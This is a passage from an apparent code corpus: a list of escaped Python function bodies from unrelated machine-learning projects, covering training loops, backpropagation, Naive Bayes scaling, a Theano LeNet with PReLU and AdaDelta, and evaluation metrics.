np.array(results) / sum(results)\n else:\n results = np.array(results)\n return results if not return_params else (results, new_model)", "def _optimise(self, n_batches: int) -> float:\n all_batches_iter = self._make_batches(n_batches)\n tr = tqdm.tqdm(all_batches_iter, desc='batch', total=n_batches)\n losses = []\n part_names, part_ops = zip(*self.loss_part_ops)\n part_ops = list(part_ops)\n for batch_num, feed_dict in enumerate(tr):\n if (self.batches_seen % 50) == 0:\n run_result = self.sess.run(\n [self.op_loss, self.op_train, self.op_summary] + part_ops,\n feed_dict=feed_dict)\n loss, _, summ = run_result[:3]\n part_losses = run_result[3:]\n self.summary_writer.add_summary(summ, self.batches_seen)\n else:\n run_result = self.sess.run(\n [self.op_loss, self.op_train] + part_ops,\n feed_dict=feed_dict)\n loss = run_result[0]\n part_losses = run_result[2:]\n tr.set_postfix(loss=loss)\n losses.append(loss)\n self.batches_seen += 1\n self._log_op_value('train-loss', loss)\n assert len(part_names) == len(part_losses)\n for part_loss_name, part_loss in zip(part_names, part_losses):\n self._log_op_value('loss-%s' % part_loss_name, part_loss)\n return np.mean(losses)", "def trainUsingNNOnPenDigitData(actualData, labels, testData, 
testLabels):\n # Initialize variables\n epoch = 40\n eta = 0.01\n inputNeurons = actualData.shape[1]\n hiddenNeurons = 10\n outputNeurons = 4\n\n # Initialize weights and bias of hidden layer and output layer\n weightsHidden = np.random.uniform(-1, 0.99, size=(inputNeurons+1, hiddenNeurons))\n weightsOutput = np.random.uniform(-1, 0.99, size=(hiddenNeurons+1, outputNeurons))\n\n biasInput = np.ones((actualData.shape[0], 1))\n actualData = np.append(actualData, biasInput, axis=1)\n biasTest = np.ones((testData.shape[0], 1))\n testData = np.append(testData, biasTest, axis=1)\n\n # Outer loop for all the Epochs\n for i in range(epoch):\n print(\"Epoch: \", i)\n for index, row in enumerate(actualData):\n\n # Forward Propogation\n hiddenInputs = np.dot(row, weightsHidden)\n # hiddenActivation = nn.sigmoid(hiddenInputs)\n hiddenActivation = nn.sigmoid(hiddenInputs)\n hiddenActivation = np.append(hiddenActivation, [1], axis=0)\n outputInputs = np.dot(hiddenActivation, weightsOutput)\n sMaxOutput = nn.softMax(outputInputs)\n\n # Calculating stuff for backpropogation\n crossEntropyError = nn.calculateError(sMaxOutput, labels[index])\n\n # BackPropogation from Output to Hidden Layer\n derCrossEntropyErrors = nn.calculateDerCrossEntropy(sMaxOutput, labels[index])\n derSoftMaxOutputs = nn.calculateDerSoftMax(outputInputs)\n derOutputWeights = hiddenActivation\n updateWeightsOutput = np.matmul(derOutputWeights.reshape(hiddenNeurons+1, 1),\n np.transpose(derCrossEntropyErrors * derSoftMaxOutputs).reshape(1, 4))\n\n # BackPropogation from Hidden to Input Layer\n derTotalError = np.array([])\n temp1 = derCrossEntropyErrors * derSoftMaxOutputs\n\n for p, eachWeight in enumerate(weightsOutput):\n derTotalError = np.append(derTotalError, np.dot(np.transpose(temp1), eachWeight))\n\n derTotalError = derTotalError[:-1]\n derSigmoidHiddenInputs = nn.derivativeSigmoid(hiddenInputs)\n temp2 = derTotalError * derSigmoidHiddenInputs\n\n replicatedInput = nn.replicateRow(row, hiddenNeurons)\n\n updateWeightsInput = np.zeros(weightsHidden.shape)\n for p, eachRow in enumerate(np.transpose(replicatedInput)):\n updateWeightsInput[p] = temp2 * eachRow\n\n weightsOutput = weightsOutput - eta * updateWeightsOutput\n weightsHidden = weightsHidden - eta * updateWeightsInput\n\n correct = 0\n for j, r in enumerate(testData):\n # Forward Propogation\n hiddenInputs = np.dot(r, weightsHidden)\n # hiddenActivation = nn.sigmoid(hiddenInputs)\n hiddenActivation = nn.tanh(hiddenInputs)\n hiddenActivation = np.append(hiddenActivation, [1], axis=0)\n outputInputs = np.dot(hiddenActivation, weightsOutput)\n\n # Calculating stuff for backpropogation\n sMaxOutput = nn.softMax(outputInputs)\n predictedLabel = np.argmax(sMaxOutput) + 1\n if predictedLabel == (np.argmax(testLabels[j]) + 1):\n correct += 1\n\n print(\"Correct \", correct)\n print(\"Total \", testData.shape[0])\n accuracy = float(correct) / testData.shape[0]\n print(\"Accuracy: \", accuracy)", "def nb_norm(x_train, y_train, x_test):\n\n def pr(x, y_i, y):\n p = x[y == y_i].sum(0)\n return (p + 1) / ((y == y_i).sum() + 1)\n\n r = np.log(pr(x_train, 1, y_train) / pr(x_train, 0, y_train))\n r = sp.csr_matrix(r)\n x_train = x_train.multiply(r)\n x_test = x_test.multiply(r)\n\n return x_train, x_test", "def epoch_iter(model, data, optimizer, epoch):\n total_bpd = 0.0\n for i, (inputs, _targets) in enumerate(data):\n log_px = model.forward(inputs)\n loss = -log_px.mean()\n\n if model.training:\n # update gradients\n model.zero_grad()\n loss.backward()\n optimizer.step()\n\n # per 
dimension\n bpd = loss.item() / (x_dim * np.log(2))\n print({'epoch': epoch, 'i':i, 'loss':loss.item(), 'bpd':bpd})\n total_bpd += bpd\n\n avg_bpd = total_bpd / len(data)\n return avg_bpd", "def train(net):\n\n # Set SGD hyperparameters\n n_iter = 200 # number of iterations of SGD\n learning_rate = 1e-3 # learning rate for SGD\n momentum = .99 # momentum parameter for SGD\n batch_size = 100 # number of data points in each mini-batch\n\n # Initialize binary cross-entropy loss function\n loss_fn = nn.BCELoss()\n\n # Initialize SGD optimizer with momentum\n optimizer = optim.SGD(net.parameters(), lr=learning_rate, momentum=momentum)\n\n # Placeholder to save loss at each iteration\n track_loss = []\n\n # Loop over iterations\n for i in range(n_iter):\n\n # Sample minibatch of oriented grating stimuli\n stimuli, tilt = sample_stimuli(batch_size)\n\n # Evaluate loss and update network weights\n out = net(stimuli) # predicted probability of tilt right\n loss = loss_fn(out, tilt) # evaluate loss\n optimizer.zero_grad() # clear gradients\n loss.backward() # compute gradients\n optimizer.step() # update weights\n \n # Keep track of loss at each iteration\n track_loss.append(loss.item())\n\n # Track progress\n if (i + 1) % (n_iter / 10) == 0:\n print('iteration %i | loss: %.3f | percent correct: %.2f%%' % (i + 1, loss.item(), 100 * pcorrect(out, tilt)))\n \n # Plot loss\n plt.plot(track_loss)\n plt.xlabel('iterations of SGD')\n plt.ylabel('binary cross-entropy loss')\n plt.xlim([0, None])\n plt.ylim([0, None])\n plt.show()", "def generateStats(self):\n\t\tn = float(self.n)\n\t\tm = float(self.m)\n\t\tk = float(self.k)\n\t\tp_fp = math.pow(1.0 - math.exp(-(k*n)/m), k)\n\t\tprint \"Probability of false positives: \", p_fp\n\t\tprint \"Predicted false positive rate: \", p_fp * 100.0\n\t\tprint \"Number of elements entered in filter: \", n\n\t\tprint \"Number of bits in filter: \", m\n\t\tprint \"Number of hashes in filter: \", k", "def __init__(\n self,\n hidden_dims,\n input_dim=3 * 32 * 32,\n num_classes=10,\n dropout=1,\n normalization=None,\n reg=0.0,\n weight_scale=1e-2,\n dtype=np.float32,\n seed=None,\n ):\n self.normalization = normalization\n self.use_dropout = dropout != 1\n self.reg = reg\n self.num_layers = 1 + len(hidden_dims)\n self.dtype = dtype\n self.params = {}\n\n Din, Dout = input_dim, hidden_dims[0]\n for i in range(self.num_layers):\n self.params['W' + str(i+1)] = np.random.normal(scale=weight_scale, size=(Din, Dout))\n self.params['b' + str(i+1)] = np.zeros((Dout,))\n Din = Dout\n if i < len(hidden_dims) - 1:\n Dout = hidden_dims[i+1]\n if i == len(hidden_dims) - 1:\n Dout = num_classes\n \n # BN params initialization\n if self.normalization != None:\n for i in range(self.num_layers - 1):\n self.params['gamma' + str(i+1)] = np.ones(shape=(hidden_dims[i]))\n self.params['beta' + str(i+1)] = np.zeros(shape=(hidden_dims[i]))\n\n # When using dropout we need to pass a dropout_param dictionary to each\n # dropout layer so that the layer knows the dropout probability and the mode\n # (train / test). You can pass the same dropout_param to each dropout layer.\n self.dropout_param = {}\n if self.use_dropout:\n self.dropout_param = {\"mode\": \"train\", \"p\": dropout}\n if seed is not None:\n self.dropout_param[\"seed\"] = seed\n\n # With batch normalization we need to keep track of running means and\n # variances, so we need to pass a special bn_param object to each batch\n # normalization layer. 
You should pass self.bn_params[0] to the forward pass\n # of the first batch normalization layer, self.bn_params[1] to the forward\n # pass of the second batch normalization layer, etc.\n self.bn_params = []\n if self.normalization == \"batchnorm\":\n self.bn_params = [{\"mode\": \"train\"} for i in range(self.num_layers - 1)]\n if self.normalization == \"layernorm\":\n self.bn_params = [{} for i in range(self.num_layers - 1)]\n\n # Cast all parameters to the correct datatype\n for k, v in self.params.items():\n self.params[k] = v.astype(dtype)", "def calc_std_nDCG_AP_corpus_smoothing(p):\n \n# nDCG_MAP_res = base_path +\"\\\\nDCG_MAP_res\\\\\"\n measures_res = linux_base_path+ \"/measures_res\"+setup+\"/\"\n k_val = 50\n NDCG_AP_all_claims_all_param_values = read_pickle(measures_res+\"NDCG_AP_prec_at_k_all_claims_all_param_values_top_k_docs_\"+str(k_val)+\"_at_\"+str(p)) #key:clm,alpha_f,beta_f,k_val,lambda_f val nDCG_score,AP_score\n each_params_AVGnDCG_MAP_dict = read_pickle(measures_res+\"each_params_AVGnDCG_MAP_prec_at_k_dict_top_k_docs_\"+str(k_val)+\"_at_\"+str(p)) #key:alpha_f,beta_f,k_val,lambda_f\n nDCG_MAP_std = {} #key is a configuration quadruplet, value is the std of the measures\n \n \n \n# for k_val in top_k_docs_values:\n for alpha in range(0,11,1): #change just for test!\n for beta in range(0,10,1):\n for lambda_int in range(0,11,1):\n lambda_f = turn_to_float([lambda_int])\n (alpha_f,beta_f) = turn_to_float([alpha,beta])\n curr_AP_var = 0\n curr_nDCG_var = 0\n curr_prec_at_5_var = 0\n curr_prec_at_10_var = 0\n for clm in claim_list:\n curr_nDCG_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][0] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][0])**2\n curr_AP_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][1] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][1])**2\n curr_prec_at_5_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][2] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][2])**2\n curr_prec_at_10_var +=(NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][3] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][3])**2\n curr_nDCG_std = float(float(math.sqrt(curr_nDCG_var))/float(len(claim_list)))\n curr_AP_std = float(float(math.sqrt(curr_AP_var))/float(len(claim_list)))\n curr_prec_at_5_std = float(float(math.sqrt(curr_prec_at_5_var))/float(len(claim_list)))\n curr_prec_at_10_std =float(float(math.sqrt(curr_prec_at_10_var))/float(len(claim_list)))\n nDCG_MAP_std[alpha_f,beta_f,k_val,lambda_f] = (curr_nDCG_std,curr_AP_std,curr_prec_at_5_std,curr_prec_at_10_std)\n save_pickle(measures_res+\"nDCG_MAP_prec_at_k_std_for_each_configuration_k_top_docs_\"+str(k_val)+\"_at_\"+str(p), nDCG_MAP_std)", "def _train_epoch(self, train_batches, dropout_keep_prob, data, batch_size, save_dir, save_prefix):\n pad_id = self.vocab.get_id(self.vocab.pad_token)\n total_num, total_loss = 0, 0\n log_every_n_batch, n_batch_loss = 50, 0\n eval_every_n_batch = (len(data.train_set) - 1) / (8 * batch_size)\n for bitx, batch in enumerate(train_batches, 1): \n feed_dict = {self.p: batch['passage_token_ids'],\n self.q: batch['question_token_ids'],\n self.pc: batch['passage_char_ids'],\n self.qc: batch['question_char_ids'],\n self.p_em: batch['passage_em'],\n self.p_pos: batch['passage_pos'],\n self.q_pos: batch['question_pos'],\n self.p_length: batch['passage_length'],\n self.q_length: batch['question_length'],\n 
self.start_label: batch['start_id'],\n self.end_label: batch['end_id'],\n self.pr: batch['passage_rank'],\n self.dropout_keep_prob: dropout_keep_prob}\n\n _, loss = self.sess.run([self.train_op, self.loss], \n feed_dict=feed_dict)\n\n total_loss += loss * len(batch['raw_data'])\n total_num += len(batch['raw_data'])\n n_batch_loss += loss\n if log_every_n_batch > 0 and bitx % log_every_n_batch == 0:\n self.logger.info('Average loss from batch {} to {} is {}'.format(\n bitx - log_every_n_batch + 1, bitx, n_batch_loss / log_every_n_batch))\n n_batch_loss = 0\n \n if eval_every_n_batch > 0 and bitx % eval_every_n_batch == 0:\n self.logger.info('Evaluating the model ...')\n if data.dev_set is not None:\n eval_batches = data.gen_mini_batches('dev', batch_size, pad_id, shuffle=False)\n eval_loss, bleu_rouge = self.evaluate(eval_batches)\n self.logger.info('Dev eval loss {}'.format(eval_loss))\n self.logger.info('Dev eval result: {}'.format(bleu_rouge))\n\n if bleu_rouge['ROUGE-L'] > self.max_rouge_l:\n self.save(save_dir, save_prefix)\n self.max_rouge_l = bleu_rouge['ROUGE-L']\n else:\n self.logger.warning('No dev set is loaded for evaluation in the dataset!')\n\n return 1.0 * total_loss / total_num", "def __init__(self,\n dataset='mnist.pkl.gz',\n nkerns=[20, 50], batch_size=500, update_rule = 'regular', config=None, dropout=0, activation='tanh'):\n if activation=='tanh':\n activation_fn = T.tanh\n # Set activation function to none because with PreLU additional alpha variables have to be initialized\n # by setting the activation function to None the linear activation will be retrieved which then can be\n # activated by my PreLU implementation\n elif activation=='PreLU':\n activation_fn = None\n\n rng = numpy.random.RandomState(23455)\n\n datasets = load_data(dataset)\n\n train_set_x, train_set_y = datasets[0]\n valid_set_x, valid_set_y = datasets[1]\n test_set_x, test_set_y = datasets[2]\n\n # compute number of minibatches for training, validation and testing\n n_train_batches = train_set_x.get_value(borrow=True).shape[0]\n n_valid_batches = valid_set_x.get_value(borrow=True).shape[0]\n n_test_batches = test_set_x.get_value(borrow=True).shape[0]\n n_train_batches //= batch_size\n n_valid_batches //= batch_size\n n_test_batches //= batch_size\n self.n_train_batches = n_train_batches\n self.n_valid_batches = n_valid_batches\n self.n_test_batches = n_test_batches\n self.loss_history = []\n self.val_error_history = []\n self.train_error_history = []\n # allocate symbolic variables for the data\n\n index = T.lscalar() # index to a [mini]batch\n mode = T.lscalar() # 1 = training (dropout enabled), 0 = testing (dropout disabled)\n\n # start-snippet-1\n x = T.matrix('x') # the data is presented as rasterized images\n y = T.ivector('y') # the labels are presented as 1D vector of\n # [int] labels\n\n ######################\n # BUILD ACTUAL MODEL #\n ######################\n print('... 
building the model')\n\n # Reshape matrix of rasterized images of shape (batch_size, 28 * 28)\n # to a 4D tensor, compatible with our LeNetConvPoolLayer\n # (28, 28) is the size of MNIST images.\n layer0_input = x.reshape((batch_size, 1, 28, 28))\n\n # Construct the first convolutional pooling layer:\n # filtering reduces the image size to (28-5+1 , 28-5+1) = (24, 24)\n # maxpooling reduces this further to (24/2, 24/2) = (12, 12)\n # 4D output tensor is thus of shape (batch_size, nkerns[0], 12, 12)\n layer0 = LeNetConvPoolLayer(\n rng,\n input=layer0_input,\n image_shape=(batch_size, 1, 28, 28),\n filter_shape=(nkerns[0], 1, 5, 5),\n poolsize=(2, 2),\n activation = activation_fn\n )\n if(activation=='PreLU'):\n ########################\n # PreLU Implementation #\n ########################\n # if the activation function is PreLU alpha has to be initialized with the same shape as the bias\n # alpha will be initialized at 0.25 as suggested in the article that introduced PreLU\n # Reference: Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification\n # (Kaiming He; Xiangyu Zhang; Shaoqing Ren; Jian Sun, Microsoft, 2015)\n alpha0 = theano.shared(numpy.ones(layer0.b.get_value().shape,dtype=theano.config.floatX)*0.25, borrow=True)\n layer1_input = self.PreLU(layer0.output, alpha0.dimshuffle('x', 0, 'x', 'x'))\n else:\n layer1_input = layer0.output\n\n # Construct the second convolutional pooling layer\n # filtering reduces the image size to (12-5+1, 12-5+1) = (8, 8)\n # maxpooling reduces this further to (8/2, 8/2) = (4, 4)\n # 4D output tensor is thus of shape (batch_size, nkerns[1], 4, 4)\n layer1 = LeNetConvPoolLayer(\n rng,\n input=layer1_input,\n image_shape=(batch_size, nkerns[0], 12, 12),\n filter_shape=(nkerns[1], nkerns[0], 5, 5),\n poolsize=(2, 2),\n activation = activation_fn\n )\n if (activation == 'PreLU'):\n alpha1 = theano.shared(numpy.ones(layer1.b.get_value().shape, dtype=theano.config.floatX) * 0.25,\n borrow=True)\n layer1_output = self.PreLU(layer1.output, alpha1.dimshuffle('x', 0, 'x', 'x'))\n else:\n layer1_output = layer1.output\n\n # the HiddenLayer being fully-connected, it operates on 2D matrices of\n # shape (batch_size, num_pixels) (i.e matrix of rasterized images).\n # This will generate a matrix of shape (batch_size, nkerns[1] * 4 * 4),\n # or (500, 50 * 4 * 4) = (500, 800) with the default values.\n layer2_input = layer1_output.flatten(2)\n\n # Add dropout if dropout value is higher than 0 and in training mode\n if(dropout>0):\n layer2_input = theano.ifelse.ifelse(theano.tensor.eq(mode, 1), self.Dropout(layer2_input, dropout, rng), layer2_input)\n\n layer2 = HiddenLayer(\n rng,\n input=layer2_input,\n n_in=nkerns[1] * 4 * 4,\n n_out=500,\n activation=activation_fn\n )\n if (activation == 'PreLU'):\n alpha2 = theano.shared(numpy.ones(layer2.b.get_value().shape, dtype=theano.config.floatX) * 0.25,\n borrow=True)\n layer2_output = self.PreLU(layer2.output, alpha2)\n else:\n layer2_output = layer2.output\n\n # Add dropout if dropout value is higher than 0 and in training mode\n if (dropout > 0):\n layer3_input = theano.ifelse.ifelse(theano.tensor.eq(mode, 1), self.Dropout(layer2_output, dropout, rng),\n layer2_output)\n else:\n layer3_input = layer2_output\n\n # classify the values of the fully-connected sigmoidal layer\n layer3 = LogisticRegression(input=layer3_input, n_in=500, n_out=10)\n\n # the cost we minimize during training is the NLL of the model\n cost = layer3.negative_log_likelihood(y)\n #self.print_output = 
theano.function(\n # [index],\n # [alpha0.dimshuffle('x',0,'x','x'), layer0.b, layer0.output],\n # givens={\n # x: test_set_x[index * batch_size: (index + 1) * batch_size],\n # },\n # on_unused_input='ignore'\n #)\n self.print_layer2 = theano.function(\n [index],\n layer2_input,\n givens={\n x: test_set_x[index * batch_size: (index + 1) * batch_size],\n mode: 1\n },\n on_unused_input = 'ignore' # if dropout<0 the 'mode' variable will be unused\n )\n # create a function to compute the mistakes that are made by the model\n self.test_model = theano.function(\n [index],\n layer3.errors(y),\n givens={\n x: test_set_x[index * batch_size: (index + 1) * batch_size],\n y: test_set_y[index * batch_size: (index + 1) * batch_size],\n mode: 0\n },\n on_unused_input = 'ignore' # if dropout<0 the 'mode' variable will be unused\n )\n\n self.validate_model = theano.function(\n [index],\n layer3.errors(y),\n givens={\n x: valid_set_x[index * batch_size: (index + 1) * batch_size],\n y: valid_set_y[index * batch_size: (index + 1) * batch_size],\n mode: 0\n },\n on_unused_input = 'ignore' # if dropout<0 the 'mode' variable will be unused\n )\n self.train_error_model = theano.function(\n [index],\n layer3.errors(y),\n givens={\n x: train_set_x[index * batch_size: (index + 1) * batch_size],\n y: train_set_y[index * batch_size: (index + 1) * batch_size],\n mode: 0\n },\n on_unused_input = 'ignore' # if dropout<0 the 'mode' variable will be unused\n )\n\n # create a list of all model parameters to be fit by gradient descent\n params = layer3.params + layer2.params + layer1.params + layer0.params\n\n if activation == 'PreLU':\n alpha = [alpha0, alpha1, alpha2]\n params += alpha\n # create a list of gradients for all model parameters\n grads = T.grad(cost, params)\n\n # train_model is a function that updates the model parameters by\n # SGD Since this model has many parameters, it would be tedious to\n # manually create an update rule for each model parameter. We thus\n # create the updates list by automatically looping over all\n # (paras[i], grads[i]) pairs.\n if update_rule=='regular':\n if(config is None) : config = {}\n config.setdefault('learning_rate', 0.1)\n updates = [\n (param, param - 0.1 * grad)\n for param, grad in zip(params, grads)\n ]\n ###########################\n # AdaDelta implementation #\n ###########################\n # Implementing the adaDelta update rule as described in AdaDelta: An adaptive learning rate method\n # (Matthew D. 
Zeiler, Google, 2012)\n elif update_rule=='adaDelta':\n\n if(config is None): config = {}\n config.setdefault('decay_rate',0.95)\n config.setdefault('epsilon',1e-6)\n config.setdefault('learning_rate', 1.)\n \n # E(g^2) is a Theano variable to store the moving average of the squared gradient\n Egrads = [\n theano.shared(numpy.zeros_like(param.get_value(),dtype=theano.config.floatX),borrow=True)\n for param in params\n ]\n # E(dx^2) is a Theano variable to store the moving average of the squared updates to the parameters\n Edxs = [\n theano.shared(numpy.zeros_like(param.get_value(),dtype=theano.config.floatX),borrow=True)\n for param in params\n ]\n # The updated E(g^2) value is calculated and will be added to the parameter updates\n Egrads_new = [\n config['decay_rate'] * Egrad + (1 - config['decay_rate']) * (grad ** 2)\n for (Egrad, grad) in zip(Egrads, grads)\n ]\n # The parameter update is calculated using the AdaDelta update rule\n dxs = [\n -(T.sqrt(Edx + config['epsilon']) / T.sqrt(Egrad_new + config['epsilon'])) * grad\n for (Edx, Egrad_new, grad) in zip(Edxs, Egrads_new, grads)\n ]\n # The updated E(dx^2) value is calculated and will be added to the parameter updates\n Edxs_new = [\n config['decay_rate']*Edx + (1-config['decay_rate']) * (dx ** 2)\n for (Edx, dx) in zip(Edxs, dxs)\n ]\n Egrads_updates = zip(Egrads, Egrads_new)\n Edxs_updates = zip(Edxs, Edxs_new)\n param_updates = [\n (param, param+dx)\n for (param, dx) in zip(params, dxs)\n ]\n # The new E(g^2) and E(dx^2) are added to the parameter updates so they will be updated at the same time\n # as the model parameters.\n updates = param_updates + Egrads_updates + Edxs_updates\n\n else:\n raise ValueError('Unrecognized update rule %s' % update_rule)\n self.train_model = theano.function(\n [index],\n cost,\n updates=updates,\n givens={\n x: train_set_x[index * batch_size: (index + 1) * batch_size],\n y: train_set_y[index * batch_size: (index + 1) * batch_size],\n mode: 1 # in training mode dropout is enabled (if dropout>0)\n },\n on_unused_input = 'ignore' # if dropout<0 the 'mode' variable will be unused\n )\n\n # end-snippet-1\n\n ###############\n # TRAIN MODEL #\n ###############", "def _evaluate_during_fit(self, test_loader, epoch):", "def BatchNorm(X): # (X - mu) / sigma -> Have to implement trainable parameters gamma and beta on this\n epsilon = 0.001 # To prevent overflow and ensure numerical stability\n bn = (X - torch.mean(X)) / (torch.std(X)+epsilon)\n sigma.append(torch.std(X)+epsilon)\n return bn", "def compute_means(opts, train_data, sampler):\n exp_names = train_data[\"exp_names\"].value\n means = []\n stds = []\n if opts[\"flags\"].normalize is True:\n running_stats = []\n # a running stat for each channel\n running_stats = RunningStats(3)\n # loop over the experiments\n\n # for exp_name in exp_names:\n for j in range(0, len(exp_names), 2):\n batch = sampler.get_minibatch()\n exp_name = batch[2][0]\n print(exp_name)\n # loop over the keys\n\n seq_len = train_data[\"exps\"][exp_name][\"labels\"].shape[0]\n temp_feat = batch[0].cpu().numpy()\n temp_feat = temp_feat[:seq_len, :, :, :]\n\n channel_feats = []\n for i in range(3):\n # channel_feat = temp_feat[0, :, i, :]\n # sample frames\n channel_feat = temp_feat[::100, i, :]\n channel_feat = channel_feat.reshape(-1, 1)\n channel_feats.append(channel_feat)\n\n channel_feats = np.concatenate(channel_feats, axis=1)\n running_stats.add_data(\n channel_feat\n )\n\n means = running_stats.mean.tolist()\n stds = running_stats.compute_std().tolist()\n else:\n means = [.5, 
.5, .5]\n stds = [1, 1, 1]\n # for key in opts[\"flags\"].feat_keys:\n # temp_feat = train_data[\"exps\"][exp_names[0]][key].value\n # mean = np.zeros((temp_feat.shape[2], ))\n # std = np.ones((temp_feat.shape[2], ))\n # means.append(mean)\n # stds.append(std)\n normalize = transforms.Normalize(mean=means,\n std=stds)\n\n return normalize", "def classify():\n yes_dataset = df[df[\"_class\"] == 1] # 470588\n no_dataset = df[df[\"_class\"] == 0] # 1971\n\n parameter_analysis = list()\n for criterion in np.arange(0.05, 0.91, 0.05):\n print(\"doing experiment at criterion = %s ...\" % criterion)\n rate_list = list()\n for i in range(10):\n # shuffle yes_dataset and no_dataset, so we can randomly choose 90% yes_dataset\n # + 90% no_dataset as train dataset, 10% yes_dataset + 10% no_dataset as test dataset\n yes_index = yes_dataset.index.tolist()\n random.shuffle(yes_index)\n no_index = no_dataset.index.tolist()\n random.shuffle(no_index)\n \n # concatenate 90%yes + 90%no, 10%yes + 10%no\n train = pd.concat([\n yes_dataset.loc[yes_index[:1774], :],\n no_dataset.loc[no_index[:423530], :]\n ])\n test = pd.concat([\n yes_dataset.loc[yes_index[1774:], :],\n no_dataset.loc[no_index[423530:], :]\n ]) \n \n # split data and label\n train_data, train_label = (train[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n train[\"_class\"])\n test_data, test_label = (test[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n test[\"_class\"])\n \n # apply classifier\n clf = GaussianNB()\n clf.fit(train_data, train_label)\n probability = clf.predict_proba(test_data).T[1]\n \n result = pd.DataFrame()\n result[\"_class\"] = test_label\n result[\"_predict\"] = probability >= criterion\n \n result_yes = result[result[\"_class\"] == 1]\n yes_yes_rate = sum(result_yes[\"_class\"] == result_yes[\"_predict\"])/len(result_yes[\"_predict\"])\n \n result_no = result[result[\"_class\"] == 0]\n no_no_rate = sum(result_no[\"_class\"] == result_no[\"_predict\"])/len(result_no[\"_predict\"])\n \n rate_list.append((yes_yes_rate, no_no_rate))\n\n rate_list = pd.DataFrame(rate_list)\n yes_yes_rate, no_no_rate = rate_list.mean()[0], rate_list.mean()[1]\n parameter_analysis.append((criterion, yes_yes_rate, no_no_rate))\n \n # save data to excel spreadsheet\n parameter_analysis = pd.DataFrame(parameter_analysis, columns=[\"criterion\", \"yes_yes_rate\", \"no_no_rate\"])\n writer = pd.ExcelWriter(\"parameter_analysis.xlsx\")\n parameter_analysis.to_excel(writer, \"parameter_analysis\", index=False)\n writer.save()", "def estimate_nb(x,y,smoothing):\n\n raise NotImplementedError", "def _fit(self):\n loss = 1e10\n weights = self._init_weights\n while loss > self._converge_epsilon:\n d_F = 2 * (self._input.t() * self._input *\n weights - self._input.t() * self._label)\n dd_F = 2 * self._input.t() * self._input\n weights = weights - dd_F.inv() * d_F\n loss = self._mse(weights)\n print('Error : {}'.format(loss))\n return weights", "def evaluate(self, train_set, test_set, shuffle_batch=True,\n epochs=25, lr_decay=0.95, sqr_norm_lim=9,labels=None,model=None): \n cost = self.negative_log_likelihood(self.y) \n dropout_cost = self.dropout_negative_log_likelihood(self.y)\n # adadelta upgrades: dict of variable:delta\n grad_updates = self.sgd_updates_adadelta(dropout_cost, lr_decay, 1e-6, sqr_norm_lim)\n # shuffle dataset and assign to mini batches.\n # if dataset size is not a multiple of batch size, replicate \n # 
extra data (at random)\n np.random.seed(3435)\n batch_size = self.batch_size\n if train_set.shape[0] % batch_size > 0:\n extra_data_num = batch_size - train_set.shape[0] % batch_size\n #extra_data = train_set[np.random.choice(train_set.shape[0], extra_data_num)]\n perm_set = np.random.permutation(train_set) \n extra_data = perm_set[:extra_data_num]\n new_data = np.append(train_set, extra_data, axis=0)\n else:\n new_data = train_set\n \n shuffled_data = np.random.permutation(new_data) # Attardi\n n_batches = shuffled_data.shape[0]/batch_size\n # divide train set into 90% train, 10% validation sets\n n_train_batches = int(np.round(n_batches*0.8))\n n_val_batches = n_batches - n_train_batches\n train_set = shuffled_data[:n_train_batches*batch_size,:]\n val_set = shuffled_data[n_train_batches*batch_size:,:] \n # push data to gpu \n # the dataset has the format [word_indices,padding,user,label]\n train_set_x, train_set_y = shared_dataset(train_set[:,:-2], train_set[:,-1]) \n train_set_u = theano.shared(np.asarray(train_set[:,-2],dtype='int32')) \n # val_set_x = val_set[:,:-2]\n # val_set_u = val_set[:,-2]\n # val_set_y = val_set[:,-1]\n val_set_x, val_set_y = shared_dataset(val_set[:,:-2], val_set[:,-1])\n val_set_u = theano.shared(np.asarray(val_set[:,-2],dtype='int32')) \n test_set_x = test_set[:,:-2]\n test_set_u = test_set[:,-2]\n test_set_y = test_set[:,-1] \n batch_start = self.index * batch_size\n batch_end = batch_start + batch_size\n\n # compile Theano functions to get train/val/test errors\n \n \n test_y_pred = self.predict(test_set_x,test_set_u)\n test_error = T.mean(T.neq(test_y_pred, self.y))\n # errors on train set\n if self.Users is not None:\n train_model = theano.function([self.index], cost, updates=grad_updates,\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end],\n self.u: train_set_u[batch_start:batch_end]\n },\n allow_input_downcast = True)\n\n train_error = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end],\n self.u: train_set_u[batch_start:batch_end]},\n allow_input_downcast=True)\n val_model = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: val_set_x[batch_start:batch_end],\n self.y: val_set_y[batch_start:batch_end], \n self.u: val_set_u[batch_start:batch_end]},\n allow_input_downcast=True)\n test_model = theano.function([self.x, self.u, self.y], test_error, allow_input_downcast=True)\n else:\n train_model = theano.function([self.index], cost, updates=grad_updates,\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end]},\n allow_input_downcast = True)\n\n train_error = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end]},\n allow_input_downcast=True)\n\n val_model = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: val_set_x[batch_start:batch_end],\n self.y: val_set_y[batch_start:batch_end]},\n allow_input_downcast=True)\n test_model = theano.function([self.x, self.y], test_error, allow_input_downcast=True)\n\n # start training over mini-batches\n print 'training...' 
